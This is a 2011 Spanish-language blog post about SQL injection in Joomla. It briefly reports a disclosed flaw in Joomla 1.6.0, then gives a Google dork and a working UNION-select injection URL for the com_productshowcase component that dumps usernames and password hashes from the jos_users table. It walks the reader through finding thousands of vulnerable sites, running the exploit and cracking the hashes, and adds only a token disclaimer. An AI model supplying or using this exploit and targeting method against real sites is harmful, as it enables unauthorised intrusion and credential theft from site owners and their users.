sábado, 19 de marzo de 2011

Sql INjection en Joomla!

Se ha publicado una vulnerabilidad de inyección SQL que afecta a la rama 1.6.0 del popular gestor de contenidos Joomla. El fallo ha sido descubierto por Aung Khant que forma parte de 'YGN Ethical Hacker Group'.

Joomla es un popular gestor de contenidos en código abierto, que cuenta con una gran cantidad de plantillas y componentes que un usuario puedo utilizar para implementar de manera rápida una aplicación web. Estos componentes son programados por todo tipo de desarrolladores. Este hecho, unido a su popularidad, convierten al gestor de contenidos en un objetivo muy popular para que los atacantes.

El fallo fue puesto en conocimiento de Joomla el pasado 24 de enero y tuvo que esperar hasta principios de marzo para que fuera publicada una actualización que solucionase este fallo de seguridad, concretamente la versión 1.6.1. El grupo ha esperado una semana desde la publicación de la actualización para hacer público el fallo, dando este plazo para que los usuarios lleven a cabo la actualización del mismo.

Se ha reportado un nuevo fallo en un componente de joomla, precisamente en com_productshowcase:

DORKS 1 : allinurl:"com_productshowcase"
EXPLOIT :index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*

Tan simple como eso.... ponemos en google la Dork y econtraremos más de 2500 sitios vulnerables. Entonces simplemente nos queda: http:sitiovulnerable.com/EXPLOIT
Luego desencriptamos los passwords con algúnn cracker MD5 de esos que andan por la red... (por ejemplo http://gdataonline.com/seekhash.php
fuente
Tutorial en http://rincondetodo.mforos.com/1783698/9018427-tutorial-inyeccion-sql-en-joomla/


Comentario: Usarlo solo con fines experimentales, El autor del blog no se hace responsable por la interpretación de la información expuesta en el Sitio, ni de su uso indebido, o sea practiquen pero no rompan.- ;)

No hay comentarios:

Publicar un comentario